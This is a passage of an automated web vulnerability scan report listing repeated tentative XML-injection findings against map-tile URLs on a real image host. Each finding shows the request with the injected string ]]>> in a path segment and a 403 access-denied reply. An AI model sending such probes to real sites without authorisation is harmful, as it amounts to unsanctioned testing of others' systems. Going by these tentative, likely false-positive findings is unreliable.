Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4ADD0764AE047491
x-amz-id-2: 5O9mgXOr8zLhxYrOFZMwPBaCGa1YLqu73GjiY2u16L1iV5aQAD7hDd6gzXt7btU9
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 92dc7dcd02b5fddc91d28c811261188ed841c594149add3488cae3dff6b87da203b732f6a0cfdc58
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4ADD0764AE047491</RequestId><HostId>5O9mgXOr8zLhxYrOFZMwPBaCGa1YLqu73GjiY2u16L1iV5aQAD
...[SNIP]...

8.251. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium]]>>/u2/v15/tiles/z19x154381y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 3EB8A69A8C092097
x-amz-id-2: SnoRvg6kwROygkbw0q/t7ReGzMg9CSXJwRuxH8GLe4zz99zW2cQGN40wtAhg9ENW
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:56 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 997dc1defe4d92f71f8609d5c473141b15060e782c65d1f98713824db4b0b47de8d06823b1bc32a5
Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>3EB8A69A8C092097</RequestId><HostId>SnoRvg6kwROygkbw0q/t7ReGzMg9CSXJwRuxH8GLe4zz99zW2c
...[SNIP]...

8.252. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2]]>>/v15/tiles/z19x154381y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 0A3E547B2B053A2F
x-amz-id-2: pjlVUh0aItBZZBHKeH9/EK0LLy94VAwlRo4rKaU9vjIRmbh7gol9TnX+w57M0vPC
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:00 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 26ae88ad44315a93742a0b227bdd0808bc0ec9d7d250e47faef7dfbbc522ea69ca96be163ed88819
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>0A3E547B2B053A2F</RequestId><HostId>pjlVUh0aItBZZBHKeH9/EK0LLy94VAwlRo4rKaU9vjIRmbh7go
...[SNIP]...

8.253. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2/v15]]>>/tiles/z19x154381y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 520BD1BA409D0929
x-amz-id-2: Qcg7YLsLZj52NKejiPt/IPM66Z5M+IyhUfxy2zjsoANjieBKJiNp6N3l+D9FJMhM
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:01 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 40142bb6a268161df57b3254c2d53fe6e8d98235d2488c06cf2caeb26d1f6ff7785d6f1acca3e1e6
Via: 1.0 d5ba42a2d3d506b64c73b6035a0a9f60.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>520BD1BA409D0929</RequestId><HostId>Qcg7YLsLZj52NKejiPt/IPM66Z5M+IyhUfxy2zjsoANjieBKJi
...[SNIP]...

8.254. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 6]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles]]>>/z19x154381y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4CE71FD6D6319239
x-amz-id-2: lFzcQYKvtfawblN/JsbDjfA7l7JFkjh71l1bHICxHB7VVe64gC2fQGcOFoUzd6Px
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:04 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 7c1d1f38a56e61ed9f1aa847a204ed57d074370508b804fbb8b2c1ae1fef8654c31f6f38f40a8275
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4CE71FD6D6319239</RequestId><HostId>lFzcQYKvtfawblN/JsbDjfA7l7JFkjh71l1bHICxHB7VVe64gC
...[SNIP]...

8.255. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 7]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png

Issue detail

The REST URL parameter 7 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 7. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png]]>>?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 56294351829D5DAC
x-amz-id-2: BN2bATG36ocD9SCk35OVmz2+W6mmVtseOkC9Kp1nFdfZ8KgqMTBd1RQ7bSrqbjnd
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:09 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 2c3f8a79312cb756a9d6796cd28baab6db8617082222c3ed40567525716fd69591da230b94e4a72c
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>56294351829D5DAC</RequestId><HostId>BN2bATG36ocD9SCk35OVmz2+W6mmVtseOkC9Kp1nFdfZ8KgqMT
...[SNIP]...

8.256. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 8949313642E9D16F
x-amz-id-2: K8lN6ufMJGG+TGqdV1uwLwKdM6K/OsaawE6hfB605CGOBM/5iEmcJU8WwVv8l+bl
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:49 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 77d7ec5281b6f145d7455c2d3cc3fa7b687c3bdc2ee0b437347e4881d8e39dff39037a69f8f51f3d
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>8949313642E9D16F</RequestId><HostId>K8lN6ufMJGG+TGqdV1uwLwKdM6K/OsaawE6hfB605CGOBM/5iE
...[SNIP]...

8.257. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues]]>>/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 03C5AE80C8944534
x-amz-id-2: e5uvTiqJSuWriFxfbQ68fwgYB7L5UOQOdxndyn0upAYM0YfnNKbdxfFKIfXHmTMk
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:52 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: c7626bc2f4081876c86cd2ac82cc9a831d657e07c4c031000c0bfe90cf9aee1a0730168ba39f8329
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>03C5AE80C8944534</RequestId><HostId>e5uvTiqJSuWriFxfbQ68fwgYB7L5UOQOdxndyn0upAYM0YfnNK
...[SNIP]...

8.258. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium]]>>/u2/v15/tiles/z19x154382y197048.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 21460A8967ECCE79
x-amz-id-2: 4oegg91E5jEup2p8ZtmqloGE6ad3z5MTzNJ9JsVlOM2tW0BNhXygfD80q00ANE5S
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:54 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 5557c92307fe3d6a5832c227b2342b5f454e907f56f4113f1cc7b7beef5171af33148d5fa05900a6
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>21460A8967ECCE79</RequestId><HostId>4oegg91E5jEup2p8ZtmqloGE6ad3z5MTzNJ9JsVlOM2tW0BNhX
...[SNIP]...

8.259. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2]]>>/v15/tiles/z19x154382y197048.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: FC6AD26B92C2128C
x-amz-id-2: 5tWpyEVGyUmc8nxPP91gWWCM8qdt3dm/X3voBvdXDBkkuxk2IOF+4/e4ZdHf4HHs
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:58 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 6d1b1958e8e72e408f801028367fa8af263d4834f08dd6fb0e9fa01876149e8433d875ec102a64b8
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>FC6AD26B92C2128C</RequestId><HostId>5tWpyEVGyUmc8nxPP91gWWCM8qdt3dm/X3voBvdXDBkkuxk2IO
...[SNIP]...

8.260. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2/v15]]>>/tiles/z19x154382y197048.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 829247D68E54C2B4
x-amz-id-2: kv/Wmlw3Z7twRuHREStDSOT2r/cRyt/JHeNIf/gToStkOjIOxhRYUgkm6jN8u3Fw
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:02 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 92c50450fe9be584ae44f84b02b8e781c99b52f45fc309361553610a9cf833c70985295b97ffe62a
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>829247D68E54C2B4</RequestId><HostId>kv/Wmlw3Z7twRuHREStDSOT2r/cRyt/JHeNIf/gToStkOjIOxh
...[SNIP]...

8.261. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 6]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles]]>>/z19x154382y197048.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 3474F07377C16569
x-amz-id-2: 9nPw0G9HE+3Lvc5tgBcchmCSpVMA7oF7xvWxe6FnlYl+pgRVy8XB9CHZ4zoxIV1U
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:04 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 53cc0f56b020c6c0fdaa005c5df58c361f0d206720ee3290d07168d98fa80ec4086aa8fc55c5e47a
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>3474F07377C16569</RequestId><HostId>9nPw0G9HE+3Lvc5tgBcchmCSpVMA7oF7xvWxe6FnlYl+pgRVy8
...[SNIP]...

8.262. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 7]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png

Issue detail

The REST URL parameter 7 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 7. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png]]>>?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 75A5D03E8E39A89F
x-amz-id-2: gWEYq7baJjlyJ2STxxgY4b2ghyrCwcm1YYHxy0YtyzoAygLeI6hxvssqHghjIZX8
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:06 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 21009087d2f36971d78ee81d69a531dab1c7ccfac30e602a283b4a98e2336c8edd97eec105e84ebe
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>75A5D03E8E39A89F</RequestId><HostId>gWEYq7baJjlyJ2STxxgY4b2ghyrCwcm1YYHxy0YtyzoAygLeI6
...[SNIP]...

8.263. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F57D73D99E37C7ED
x-amz-id-2: rkpOJn4RJ2EQGgBETjja1eHf/397Rko11Jcm+zTdEzN2tvBXIkImjRNwe2Qm6NLt
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:50 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 82dd33f8553ab2cf33fc46ce703cf187671436cc202c98bc06df7383b9f0cdca79ab2934923ab0ca
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

